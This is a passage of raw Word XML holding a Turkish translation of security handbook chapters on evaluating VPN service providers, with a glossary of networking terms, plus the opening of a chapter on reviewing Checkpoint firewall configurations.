        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006C421B">
        <w:t>Bir VPN servis sağlayıcısının değerlendirilmesi</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Bir VPN servis sağlayıcısını değerlendirirken göz önünde bulundurulacak faktörler şunlardır:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Hizmet kalitesi</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Güvenlik</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="006C421B">
        <w:t>idare edilebilirlik</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Sağlayıcının kendi ağlarının ve ağ operasyon merkezlerinin menkul kıymetleri</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="000315D3">
        <w:t>Sağlayıcının işe alım uygulamalarını araştırın (uzmanlık, geçmiş kontrolleri)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="12" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Sağlayıcı hangi dağıtım öncesi ve sonrası hizmetleri sunmaktadır (güvenlik açığı değerlendirmesi, adli tıp)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Ancak, asıl amaç şirket için geniş bir alan ağı sağlamaksa, genel ağ kullanılabilirliği hız birincil endişe olmalı. Sağlayıcılar şu anda bunu belirli bir seviyeyi garanti ederek ölçüyorlar. genel ağ ortalamalarına bağlı olarak verimlilik, gecikme ve kullanılabilirlik gibi performans. </w:t>
      </w:r>
      <w:r w:rsidRPr="000315D3">
        <w:t>Kendi omurgalarını oluşturan sağlayıcılar, birçok müşteri VPN'sini desteklemek için bunları kullanır. Bazı VPN servis sağlayıcıları, müşteri VPN'leri için Asenkron Aktarım Modu veya Frame Relay aktarımı yoluyla özel WAN hizmeti sağlar. Bu şekilde, VPN trafiğinin bant genişliği için genel İnternet trafiğiyle rekabet etmesi gerekmez ve VPN servis sağlayıcısı, ağın uçtan uca performansını yönetmek için daha iyi bir iş yapabilir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Hizmet K</w:t>
      </w:r>
      <w:r w:rsidRPr="000315D3">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>alitesi</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">VPN servis sağlayıcıları, ses verileri gibi performansa duyarlı trafik için garantiler sunmaya başlıyor ve multimedya. Örneğin, bir ağ, akışlı bir video aktarımına dosya indirme yerine daha yüksek öncelik verebilir, çünkü videonun kullanılabilir olması için hızlı aktarım yapmasını gerektirir. </w:t>
      </w:r>
      <w:r w:rsidRPr="000315D3">
        <w:t>Buradaki zorluk, bu garantiyi ağ sınırları içerisinde sunabilmektir. Şu anda tek bir ağ üzerinden seyahat eden trafik ile mümkün olsa da, birkaç ağ üzerinden geçmesi gereken trafik için neredeyse imkansızdır. Bunun nedeni, MPLS gibi standartların gelişmesine rağmen, bir ağ üzerinden trafiğe öncelik vermek için internetin çok daha az öncelikleri için mevcut tek bir standart bulunmamasıdır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Daha iyi performans sağlamak için, birçok VPN servis sağlayıcısı servis seviyesi anlaşmaları sunar. Ek bir ücret karşılığında, servis kalitesi ile orantılı olarak bir VPN servis sağlayıcısı, müşterilerine verim, çevirmeli erişim ve ağ kullanılabilirliği konusunda garanti verebilir. Bazı VPN servis sağlayıcılarının, VPN trafiğinin büyük kısmının yönlendirildiği, kendi Özel Çerçeve Rölesi veya Asenkron Ttransfer modu şebekeleri vardır. arttırıcı performans</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="000315D3" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000315D3">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Güvenlik</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Bir VPN, şifreleme, tünel oluşturma ve kimlik doğrulama / yetkilendirme kombinasyonu ile güvenlik sağlar. Güvenlik duvarı, yalnızca güvenilir, yetkili paketlere veya kullanıcıların erişmesine izin vererek çevre güvenliği savunması sağlar. kurumsal ağa. Şirketler VPN servis sağlayıcılarının güvenlik yöntemini seçmesini seçebilir VPN'leri için ve şirket içinde yönetebilir veya servis sağlayıcının bu işlevi yönetmesine izin verebilir.  Diğer bir seçenek ise müşterinin VPN'in güvenlik politikası tanımını tamamen ele almasıdır. Çoğu güvenlik yöneticisi, özellikle son kullanıcı yönetimi, politika ve kimlik </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">doğrulama alanlarında, ağlarının güvenliği üzerinde bir miktar kontrol sahibi olmayı tercih eder. </w:t>
      </w:r>
      <w:r w:rsidRPr="000315D3">
        <w:t>Bir şirket kendi şifrelemesini yapmayı seçebilir, örneğin kendi güvenlik sunucusunu yönetebilir, ancak VPN servis sağlayıcısını, VPN yönetiminin uyarıları izlemek ve yanıtlamak gibi diğer yönleri için kullanabilir. Güvenliği bazılarının dış kaynaklardan sağlayıp sağlamama kararı, bir şirketin büyüklüğü ve BT kaynaklarıyla ilgili olmalıdır. Diğerleri için, dış kaynak kararlarının, kurumsal verilerin kritik niteliği ve BT yöneticisinin genel olarak dış kaynak sağladığı güven ile ilgisi vardır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:firstLine="708"/>
      </w:pPr>
      <w:r>
        <w:t>Sergi 40.7, dış kaynaklı VPN'leri değerlendirirken dikkate alınması gereken faktörleri sıralar.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="000315D3" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000315D3">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>İdare Edilebilirlik</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="000315D3">
        <w:t>Dikkate alınması gereken bir diğer husus, VPN servis sağlayıcısından ihtiyaç duyulan yönetim ve raporlama yetenekleridir. Birçok VPN servis sağlayıcısı, abonelere ağ performans verilerine ve müşteri kullanım raporlarına bir tür Web tabanlı erişim sunar.</w:t>
      </w:r>
      <w:r w:rsidRPr="000315D3">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000315D3">
        <w:t>Web tabanlı araçlar, kullanıcıların yürütme gibi görevleri gerçekleştirmelerini sağlar uzaktan yapılandırma güncellemeleri, kullanıcı ekleme / silme, dijital sertifikaların verilişini kontrol etme ve performans düzeyindeki verilerin izlenmesi. VPN servis sağlayıcısının, müşterilerin kullanıcı ekleyip silebileceği ve politika değişikliklerini üst düzeyde gönderebilmesi için bölünmüş yönetime izin veren ürünler sunup sunmadığını kontrol edin.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="12" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00822E74">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Özet</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Bir VPN değerlendirme stratejisi oluşturmak, güvenlik uzmanlarının bir şirketin kendi VPN sistem gereksinimlerini karşılayan gerçek özelliklerden satıcı yutturmacalarını belirlemelerini sağlar. Anahtar, ihtiyaç duyulan VPN uygulama türüyle eşleşen bir strateji ve ölçüt seti geliştirmektir. Değerlendirme kriterleri tam olarak neyin gerekli olduğunu tanımlamalıdır. Bir uygulamalı laboratuar değerlendirmesi, güvenlik uzmanının tam olarak neyin verileceğini anlamasına yardımcı olacaktır. VPN kurulumunun ayrıntılarına özellikle dikkat edin ve seçilen herhangi bir VPN servis sağlayıcısı veya ürün satıcısı ile dikkatli olun.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Benzer şekilde, iyi düşünülmüş bir VPN dağıtım stratejisi, uygulama maliyetlerini düşürmeye, artırmaya yardımcı olacak kullanıcı kabulü ve yatırım getirisini hızlandırmak. Dağıtım stratejisi, VPN uygulamasının türüne ve seçilen dağıtım modeline bağlı olarak değişecektir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00822E74">
        <w:t>Satıcılar geleneksel olarak müşterilere mümkün olduğunca az karar noktası sunarak satış döngüsünü kolaylaştırmak istiyor. Bunu yapmanın bir yolu, VPN ürününün performans özelliklerini aşırı basitleştirmektir. Küçük, orta veya büyük boyutlu bir boyut mu istiyorsunuz? 10 kullanıcı VPN sunucusu, 100 kullanıcı VPN sunucusu veya mega kullanıcı VPN sunucusu ister misiniz? 100 MHz ya da 1 Gigabit modelini ister misiniz? VPN satıcılarının taleplerini doğrulamak için kullanılan parametreleri sağlamaları konusunda ısrar ediyorlar.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  Güvenlik uzmanlarının, satıcılar tarafından kullanılan ölçümleri ve doğrulama yöntemlerini anlamaları önemlidir. Bu bilgi ile donanmış güvenlik uzmanları ürün seçerken bilinçli kararlar alabilirler.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>VPN uygulamak için birçok seçenek vardır. Yönetilen güvenlik servis sağlayıcıları kolaylaştırabilir yükün bir kısmı ve VPN’lerin hızlı bir şekilde uygulanmasına yardımcı olur. Bununla birlikte, güvenlik uzmanları bir servis sağlayıcı seçerken gerekli özeni göstererek iyi çalışacaktır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00822E74">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Sözlük</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r w:rsidRPr="00822E74">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ATM</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  (Asenkron Aktarım Modu) Çok yüksek hızlara sahip dijital iletişim araçları; Verilerin yanı sıra görüntülerin veya sesin veya videonun iletimi için de uygundur. Yaygın olarak omurga içine yerleştirilmiş ağlar.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r w:rsidRPr="00822E74">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>DSL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (Dijital Abone Hattı) Abonelerine geniş bantlı erişim sağlamak için rekabetçi yerel değişim şirketleri ve yerel telefon şirketleri tarafından sağlanan, yüksek hızlı dijital hatlar ailesinin genel ismi.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r w:rsidRPr="00822E74">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>FTP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (Dosya Aktarım Protokolü) Kullanıcıların, yerel sistemleriyle bir ağda erişebilecekleri herhangi bir sistem arasında dosya kopyalamalarını sağlayan bir protokol. FTP istemcisi ve FTP sunucusundan oluşur.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r w:rsidRPr="00822E74">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>IKE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00822E74">
        <w:t>(İnternet Anahtar Değişimi) IPSec VPN'lerinde, bir IPSec VPN oturumu sırasında kullanılacak güvenlik parametrelerini belirlemek için kullanılan bir güvenlik protokolü (güvenlik birliği olarak adlandırılır).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r w:rsidRPr="00822E74">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>IPSec</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  (IP Güvenliği protokolü) VPN'lerde kullanılan ve güvenli IP paketlerinin formatını ve iletimini belirleyen şifreleme ve veri bütünlüğü algoritmalarını ve kurallarını tanımlayan standart bir protokol takımı.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r w:rsidRPr="00822E74">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Kbps</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00822E74">
        <w:t>Saniyedeki kilobit sayısı.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r w:rsidRPr="00822E74">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Mbps</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00822E74">
        <w:t>Saniyedeki megabitler.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r w:rsidRPr="00822E74">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>MSP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (Yönetilen Güvenlik Servis Sağlayıcısı) Varsaymayı öneren bir ağ altyapısı sağlayıcısı sınıfı müşterileri adına çeşitli ağ güvenliği görevleri. VPN servis sağlayıcıları VPN sunucusu / istemcisi sağlar dağıtım yardımı ve VPN’lerin operasyonel yönetimi.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r w:rsidRPr="00822E74">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>SSL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (Güvenli Yuva Katmanı) İlk olarak Netscape tarafından geliştirilen bir güvenlik protokolü. SSL oldu istemciler ve sunucular arasında kimliği doğrulanmış ve şifreli iletişim için evrensel olarak Web'de kabul edildi. SSL, genellikle tarayıcılarla ilişkilendirilir, ancak FTP gibi diğer TCP / IP protokollerini korumak için kullanılabilir. SSL, TLS'ye dönüşmüştür.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r w:rsidRPr="00822E74">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>TLS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  (Aktarım Katmanı Güvenliği protokolü) Internet üzerinden iletişim gizliliği sağlayan bir IETF taslak standart protokolü. Protokol, istemci / sunucu uygulamalarının gizli dinlenmeyi, kurcalamayı ve mesaj sahteciliğini önleyecek şekilde iletişim kurmasını sağlar.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r w:rsidRPr="00822E74">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>VPN client</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  Bir bireysel kullanıcı bilgisayarında bulunan ve bir VPN sunucusuna VPN tüneli kuran yazılım.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r w:rsidRPr="00822E74">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>VPN server</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  Merkezi bir konumda bulunan ve VPN tünelini sonlandıran bir cihaz (IPSec güvenlik ağ geçidi). VPN istemcileri ve diğer VPN sunucuları ile iletişim kurar. Donanım veya yazılım tabanlı olabilir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r w:rsidRPr="00822E74">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>VPN</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (Sanal Özel Ağ) Gizlilik sağlayan verileri iletme imkanı sağlayan bir ağı, kimlik doğrulama ve veri bütünlüğü.</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jc w:val="right"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="144"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C26E50">
        <w:rPr>
          <w:b/>
          <w:sz w:val="144"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>41</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00C26E50" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">BİR </w:t>
      </w:r>
      <w:r w:rsidRPr="00C26E50">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>DENETİM NOKTASI</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00C26E50" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>GÜVENLİK DUVARI</w:t>
      </w:r>
      <w:r w:rsidRPr="00C26E50">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> GÜVENLİK</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>İNCELEMESİ</w:t>
      </w:r>
      <w:r w:rsidRPr="00C26E50">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> NASIL YAPILIR</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>____________________________________________</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00C26E50" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C26E50">
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Ben Rothke ,CISSP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C26E50">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Değiştirilmiş Devletler, yalnızca deney yapan bir araştırma bilimcisi hakkı</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ndaki bilim kurgu filmi değildi.</w:t>
      </w:r>
      <w:r w:rsidRPr="00C26E50">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>insan bilincinin değişmiş halleri; Aynı zamanda kurumsal işletmelerdeki birçok güvenlik duvarı için bir metafordur.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00C26E50" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C26E50">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Genel olarak, bir güvenlik duvarı başlangıçta yüklendiğinde, bir kuruluşun güv</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">enliği ile sıkı sıkıya bağlanır. </w:t>
      </w:r>
      <w:r w:rsidRPr="00C26E50">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Gereksinimler. Bir şirket ortamında kullandıktan sonra, güvenlik duvarı kura</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">l tabanı, yapılandırma ve temel </w:t>
      </w:r>
      <w:r w:rsidRPr="00C26E50">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>işletim sistemi genellikle radikal olarak farklı bir düzenlemeye dönüşür. Bu değiştirilmiş güvenlik duvarı durumu, güvenlik duvarı incelemesini gerektiren şeydir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C26E50">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Bir güvenlik duvarı yalnızca uygun şekilde yapılandırıldığı ölçüde </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">etkilidir. Ve bugünün kurumunda </w:t>
      </w:r>
      <w:r w:rsidRPr="00C26E50">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ortamlarda, güvenlik duvarının yanlış yapılandırılmış olması kolaydır. Güvenlik duvarı kurulumunu gözden geçirerek yönetim, güvenlik duvarının ne beklediğini ve güvenli bir şekilde uygulanmasını sağlayabilir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00C26E50" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C26E50">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Bu bölüm, Checkpoint Firewall-1 için bir güvenlik duvarı incelemesi yapmaya odaklanmaktadır. Bu bilgilerin çoğu, Cisco PIX, NAI Gauntlet, Axent Raptor, vb. Dahil olmak üzere herhangi bir güvenlik duvarı için yeterince geneldir. Bir uyarı: güvenlik duvarı incelemesi bir sızma testi değildir. Bir güvenlik duvarı incelemesinin işlevi, istismarları bulmak ve güvenlik duvarına erişim sağlamak değ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">ildir; bunun yerine, tanımlamak </w:t>
      </w:r>
      <w:r w:rsidRPr="00C26E50">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>yanlışlıkla güvenlik duvarı tarafından açılan riskler.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C26E50">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
